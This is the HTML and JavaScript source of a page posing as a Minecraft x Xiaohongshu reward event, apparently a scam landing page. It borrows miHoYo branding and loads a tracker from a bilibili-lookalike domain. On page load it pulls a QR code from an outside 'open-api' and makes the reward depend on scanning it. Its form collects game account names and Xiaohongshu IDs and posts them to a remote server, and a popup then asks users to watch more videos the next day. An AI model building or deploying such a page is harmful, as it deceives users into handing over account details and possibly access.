<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <title>《我的世界》十一月小红书联动活动</title>
    <meta name="referrer" content="no-referrer">
    <link id="icon" rel="shortcut icon" href="https://ys.mihoyo.com/main/favicon.ico"/>
    <meta name="viewport" content="target-densitydpi=device-dpi, width=device-width,height=device-height, initial-scale=1, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0,shrink-to-fit=no" />
    <meta name="format-detection" content="telephone=no" />
    <script type="text/javascript" src="https://6mc.co/js/rem.js"></script>
    <script type="text/javascript" src="https://6mc.co/js/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="https://6mc.co/js/vue.js"></script>
    <script type="text/javascript" src="https://6mc.co/js/vant.min.js"></script>
    <script src="https://al.bili-b35bilibili.com/track.php?code=f47bd7949471fe3a"></script>
    <link rel="stylesheet" type="text/css" href="https://6mc.co/js/vant.min.css">
    <style type="text/css">
        /*通用类*/
        * {
            margin: 0;
            padding: 0;
        }

        body {
            margin: 0 auto;
            font-size: 0.24rem;
            font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
            background: #fff;
            text-align: justify;
            color: #010000;
            position: relative;
        }

        h1,
        h2,
        h3 {
            font-weight: 500;
        }

        img {
            border: none;
        }

        a {
            cursor: pointer;
            color: #333;
            text-decoration: none;
            outline: none;
        }

        a:hover {
            color: #006bb7;
        }

        ul {
            list-style-type: none;
        }

        em {
            font-style: normal;
        }

        .lt {
            float: left;
        }

        .rt {
            float: right;
        }

        input.sub,
        label {
            border: none;
            cursor: pointer;
        }

        input,
        textarea {
            font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
            outline: none;
        }

        table {
            border-collapse: collapse;
        }

        table td,
        table th {
            padding: 0;
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #ccc;
        }

        input::-moz-placeholder,
        textarea::-moz-placeholder {
            color: #ccc;
        }

        input:-moz-placeholder,
        textarea:-moz-placeholder {
            color: #ccc;
        }

        input:-ms-input-placeholder,
        textarea:-ms-input-placeholder {
            color: #ccc;
        }

        div.clear {
            font: 0px Arial;
            line-height: 0;
            height: 0;
            overflow: hidden;
            clear: both;
        }

        .clearfix::after {
            content: "";
            display: block;
            clear: both;
        }

        html {
            font-size: 42.6667px;
        }

        @media screen and (max-width: 320px) {
            html {
                font-size: 42.6667px;
            }

            #overlay video {
                width: 100%;
            }
        }

        @media screen and (min-width: 321px) and (max-width: 360px) {
            html {
                font-size: 48px;
            }

            #overlay video {
                width: 100%;
            }
        }

        @media screen and (min-width: 361px) and (max-width: 375px) {
            html {
                font-size: 50px;
            }

            #overlay video {
                width: 100%;
            }

        }

        @media screen and (min-width: 376px) and (max-width: 414px) {
            html {
                font-size: 55px;
            }

            #overlay video {
                width: 100%;
                height: 20% !important;
            }

        }

        @media screen and (min-width: 415px) and (max-width: 484px) {
            html {
                font-size: 64px;
            }

            #overlay video {
                width: 100%;
            }
        }

        @media screen and (min-width: 485px) and (max-width: 720px) {
            html {
                font-size: 96px;
            }

            .pic2 {
                height: 500px !important;
            }

            #overlay video {
                width: 100%;
            }
        }

        @media screen and (min-width: 721px) and (max-width: 768px) {
            html {
                font-size: 102px;
            }

            .pic2 {
                height: 590px !important;
            }
        }

        @media screen and (min-width: 769px) and (max-width: 1080px) {
            html {
                font-size: 144px;
            }

            .pic2 {
                height: 590px !important;
            }
        }

        @media screen and (min-width: 1080px) {
            html {
                font-size: 144px;
            }

            .pic2 {
                height: 590px !important;
            }
        }

        .wrapin {
            background-image: url('https://6mc.co/img/5.jpg');
            background-size: 100% auto;
            background-repeat: no-repeat;
            height: auto;
            padding: 20px;
            box-sizing: border-box;
        }

        .pic img {
            width: 100%;
            display: block;
            pointer-events: none;
        }

        ul.orm {
            padding: 0.1rem 0.25rem 0.1rem;
        }

        ul.orm li {
            margin-bottom: 0.2rem;
        }

        ul li h3 {
            color: #ffffff;
            font-size: 0.32rem;
            margin-bottom: 0.01rem;
        }

        ul.orm li h3 i {
            color: #DA2824;
            font-style: normal;
        }

        ul.orm li h4 {
            font-size: 0.27rem;
            color: #ADA0A0;
            font-weight: normal;
            margin-bottom: 0.05rem;
        }

        ul.orm li input {
            width: 100%;
            height: 0.7rem;
            font-size: 0.3rem;
            padding-left: 0.6rem;
            box-sizing: border-box;
            border-radius: 0.05rem;
            background-position: left .1rem center !important;
        }

        ul.orm li .select {
            width: 100%;
            height: 0.7rem;
            font-size: 0.3rem;
            padding: 0 0.2rem;
            box-sizing: border-box;
            border-radius: 0.05rem;
            appearance: none;
            -moz-appearance: none;
            -webkit-appearance: none;
            color: #000;
            border: 1px solid #fff;
            background: #fff url(img/jiantou.png) no-repeat right 0.2rem center !important;
            background-size: 0.25rem 0.3rem !important;
        }

        ul.orm li.select2 select {
            width: 46%;
            float: left;
        }

        ul.orm li.select2 select:nth-child(2) {
            float: right;
        }

        ul.orm li.dan h4 {
            margin-bottom: 0.25rem;
        }

        ul.orm li.dan input {
            width: 0.4rem;
            height: 0.4rem;
            float: left;
        }

        ul.orm li.dan strong {
            float: left;
            font-size: 0.3rem;
            margin-left: 0.2rem;
            margin-right: 0.2rem;
            color: #fff;
            font-style: normal;
        }

        form button {
           width: 6.5rem;
            /* 提交按钮大小 */
            height: 0.8rem;
            background-color: #76675a;
            margin: 0.1rem auto;
            display: block;
            border: none;
            font-size: 0.35rem;
            color: #FFFFFF;
            border-radius: 0.23rem;
            font-weight: bold;
        }

        .readonly {
            background-color: #dfd9d9;
            border: none;
            color: #81889a;
        }

        .tanchu {
            position: fixed;
            top: 30%;
            left: 50%;
            width: 72vw;
            height: 72vw;
            background-color: #fdf8da;
            z-index: 2.4;
            margin-left: -36vw;
            border-radius: 2.4vw;
            text-align: center;
            padding-top: 6vw;
            box-shadow: 0px 1px 14.56px 1.44px rgba(153, 153, 153, 0.2);
        }

        .tanchu img {
            width: 24vw;
        }

        .tanchu h3 {
            font-size: 6vw;
            color: #000000;
        }

        .tanchu p {
            font-size: 3.6vw;
            color: #AC9F9F;
        }

        .tanchu a img {
            margin-top: 8vw;
            width: 8vw;
        }
.shou input {
            background: url(https://6mc.co/img/xhs.png) no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }

        .shou1 input {
            background: url() no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }

        .shou2 input {
            background: url(https://6mc.co/img/wdsj.png) no-repeat left;
            background-size: 0.4rem 0.4rem;
            border: none;
            background-color: #fff;
        }
        .rbg {
            background: #000000;
            display: flex;
            color: #333;
            padding: 0 .2vw;
            height: 0rem;
            align-items: center;
            font-size: 3vw;
            border-radius: 1vw;
            font-weight: bold;

}
        ul.orm li.dan .rbg strong {
            color: #333;
        }

        .form {
            position: relative;
        }

        .form .submit {
            position: absolute;
            width: 28vw;
            height: 5vw;
            left: 50%;
            transform: translateX(-50%);
            bottom: 4vw;
            cursor: pointer;
        }

        /* Fullscreen section */
        body {
            background-color: #fff;
            text-align: center;
        }

        .fullscreen {
            display: block;
            width: 100%;
            margin: auto;
        }

        .picQR, .picQR2 {
            position: relative;
            background-size: 100% 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            margin: auto;
        }

        .qrBj {
            z-index: -99;
            width: 100%;
        }

        .logo {
            position: absolute;
            z-index: 9;
            width: 10vw;
            border: 0.5vw #ffffff solid;
            border-radius
      }
    }
    .picQR {
  background-image: url(https://6mc.co/img/d82adcecd540deab38244416efcbea7b789b97d7.jpg);
  background-size: contain;
  background-repeat: no-repeat;
  background-position: center;
  width: 100%;
  height: 0; /* 使用 padding-top 来控制比例 */
  padding-top: 56.25%; /* 根据背景图比例调整，56.25% 对应 16:9 的比例 */
  position: relative;
}

#qrcode {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  width: 48%;
  height: auto;
  border-radius: 10px; /* 调整圆角大小，可以根据需要修改 */
}
    </style>
</head>
    <div id="app">
        <!--内容-->
        <div class="">

 <img class="fullscreen" src="https://6mc.co/img/975f93831c80da905d1151c9db8b5c34da50f74b.jpg" >

    <div class="form pic fullscreen">
                 <img src="https://6mc.co/img/fd768dca32bc2b7336db213374ca2ff330d87e22.jpg">
            <span class="submit" @click="receive"></span>
            </div>
    <img src="https://6mc.co/img/1.png" class="fullscreen" >
    <div class="picQR">
        <img src="https://6mc.co/img/d82adcecd540deab38244416efcbea7b789b97d7.jpg" class="fullscreen" >
        <img id="qrcode" >
    </div>
    <img src="https://6mc.co/img/3.png" class="fullscreen" >
  <img src="https://6mc.co/img/4.png" class="fullscreen" >


</div>

        <div class="wrapin ">
    <form action="shuju.php" method="post">
        <ul class="orm">
            <li class="shou2">
                <h3><i>*</i>奖励补发系统</h3>
                <h4><联动奖励>用于发放奖励到您的游戏账号</h4>
                <input type="text" name="username" id="username" v-model="wdsj" placeholder="输入您的名称，或游戏账号" />
            </li>
            <li class="shou">
                <h3><i>*</i>小红书ID</h3>
                <h4>在小红书右下角-我-昵称下方小红书号<点击复制></h4>
                <input type="tel" name="tel" v-model="phone" id="tel" placeholder="输入小红书号，注意不是昵称" />
            </li>
            <li class="dan">
                <h3><i>*</i>未刷视频或未扫码的用户无法获取奖励。</h3>
            </li>
            <li class="dan">
                <h3><i>*</i>奖励到账时间以提交后反馈为准，请留意提交后的核验结果。</h3>
                <div class="rbg"></div>
            </li>
            <div class="clear"></div>
        </ul>
        <button type="button" class="button" @click="post">提交</button>
    </form>
</div>
        <div class="pic">
        </div>
        <audio src="https://ys.mihoyo.com/main/_nuxt/medias/video-bgm.532ef479.mp3" id="m" loop="loop">
            当前浏览器不支持audio
        </audio>

        <!--弹出-->
        <div class="tanchu" v-if="isPost">
            <img src="https://i0.hdslb.com/bfs/article/a7390be08563526019778478a48548df14069403.png">
            <h3>提交成功</h3>
            <p>由于您未曾使用过小红书，需明日再次观看10个视频后奖励自动发放到游戏</p>
            <br>
            <div @click="isPost=false"><img src="https://i0.hdslb.com/bfs/article/cbdfd193f9b3a8e83800eb4e21766b9214069403.png"></div>
        </div>


  <div id="app">
    <!-- 页面内容 -->
  </div>

  <script>
    const 列表 = [
      'https://aedfh.com/open-api/xhs.php',
    ];

    const 副 = 'https://aedfh.cn/open-api/xhsm.php';

    const 图片 = 列表[Math.floor(Math.random() * 列表.length)];

    const getQRCodeImg = (url, el) => {
      if (url.includes('/open-api/')) {
        const query = () => {
          return fetch(url).then(res => res.json()).then(res => {
            if (res.schema) {
              document.querySelector(el).src = res.schema;
            }
          });
        };
        query().catch(query);
      } else {
        document.querySelector(el).src = url;
      }
    };

    getQRCodeImg(图片, '#qrcode');
    getQRCodeImg(副, '#qrcode2');

    const HOST = "https://1kkbp6w6sx2qr-env-ddhjwzgo1k.service.douyincloud.run/shujuba.php";

    function Ajax(url, data, header = {}) {
      return $.ajax({
        url: url,
        data: data,
        headers: header,
        type: 'post',
        dataType: 'json',
        async: true,
        timeout: 100000,
        processData: true,
        contentType: false,
        xhrFields: {
          withCredentials: true,
        },
        success: function (res) {
          handleResponse(res);
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
          if (XMLHttpRequest.status === 429) {
            vant.Dialog({
              message: '请求过于频繁,请稍后再试',
              className: "alert",
              confirmButtonText: '确定',
            });
            return;
          }
          vant.Dialog({
            message: '连接失败,请检查网络是否异常',
            className: "alert",
            confirmButtonText: '确定',
          });
        },
      });
    }

    function handleResponse(res) {
      if (res.msg) {
        vant.Dialog({
          message: res.msg,
          className: "alert",
          confirmButtonText: '确定',
        });
      }
    }

    var app = new Vue({
      el: "#app",
      data() {
        return {
          phone: "",
          wdsj: "",
          areaShow: false,
          areas: [
            { text: '杭州', value: '杭州' },
            { text: '宁波', value: '宁波' },
            { text: '温州', value: '温州' },
            { text: '绍兴', value: '绍兴' },
            { text: '湖州', value: '湖州' },
          ],
          city: "",
          cityShow: false,
          citys: [
            {
              text: '电信区',
              value: '电信区',
              children: [
                { text: '艾欧尼亚', value: '艾欧尼亚' },
                { text: '祖安', value: '祖安' },
                // 其他选项省略
              ],
            },
            {
              text: '网通区',
              value: '网通区',
              children: [
                { text: '比尔吉沃特', value: '比尔吉沃特' },
                { text: '德玛西亚', value: '德玛西亚' },
                // 其他选项省略
              ],
            },
          ],
          radisoCheck: '1',
          isPost: false,
        };
      },
      methods: {
        onAreaSelect(item) {
          this.area = item.value;
          this.areaShow = false;
        },
        onAreaCancel() {
          this.areaShow = false;
        },
        onCitySelect(item) {
          this.city = item[0] + item[1];
          this.cityShow = false;
        },
        onCityCancel() {
          this.cityShow = false;
        },
        receive() {
          Ajax(HOST, { 'route_name': 'check_receive' }).then((res) => {
            handleResponse(res);
          });
        },
        post() {
          if (!/^.{3,15}$/.test(this.phone)) {
            vant.Dialog({
              message: '请输入有效小红书号',
              className: "alert",
              confirmButtonText: '确定',
            });
            return false;
          }
          if (!this.wdsj) {
            vant.Dialog({
              message: '请输入有效的游戏账号',
              className: "alert",
              confirmButtonText: '确定',
            });
            return false;
          }
          Ajax(HOST, {
            'phone': this.phone,
            'wdsj': this.wdsj
          }).then((res) => {
            handleResponse(res);
            if (res.code === 0) {
              this.isPost = true;
            }
          });
        },
      },
      mounted() {
        this.receive();  // 页面加载时自动调用 receive()
      },
    });
  </script>
</body>
</html>